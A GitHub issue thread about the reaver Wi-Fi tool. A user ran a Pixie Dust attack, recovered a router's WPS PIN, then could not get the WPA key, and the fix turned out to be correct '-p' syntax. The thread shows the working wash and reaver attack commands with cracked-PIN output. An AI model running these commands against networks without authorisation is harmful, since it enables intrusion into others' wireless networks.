t6x/reaver-wps-fork-t6x #267: Failed to recover WPA key with WPS pin found

mlg556, 2019-01-22:
So `reaver` successfully finds the WPS pin (using pixiedust attack), but when I run it again with the -p=PIN option (without pixiedust) it fails to get the WPA key. I had thought theoretically the WPA password can be instantly found when we know the WPS pin? Is it a bug or maybe the vendors have implemented a defense?

example session:

`
wash -i wlan1mon
BSSID                       Ch  dBm  WPS  Lck  Vendor      ESSID
--------------------------------------------------------------------------------
SOME_MAC              1    -77    2.0     No    RealtekS  SOME_NAME

reaver -i wlan1mon -b SOME_MAC -KvvNwL 
Pixiewps 1.4

 [?] Mode:     3 (RTL819x)
 [*] Seed N1:  -
 [*] Seed ES1: -
 [*] Seed ES2: -
 [*] PSK1:     1266edff4dad3e5d8c10ec7778dca362
 [*] PSK2:     eab5579b2d193a52169f4a66fa990135
 [*] ES1:      cc3a55112689a37d215a7a5665410c3e
 [*] ES2:      cc3a55112689a37d215a7a5665410c3e
 [+] WPS pin:  21369896

reaver -i wlan1mon -b SOME_MAC -vvNwL -p=21369896
BLABLABLA...

[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
[*] String pin was specified, nothing to save.
`

`

soxrok2212, 2019-01-22:
Did WPS lock out? Check with wash. If not, try adding -N (no nack)

mlg556, 2019-01-22:
I cannot believe it was as simple as that. As @rofl0r suggested one should use ‘ -p XXX ‘. Issue can be closed.

closed 2019-01-22 by mlg556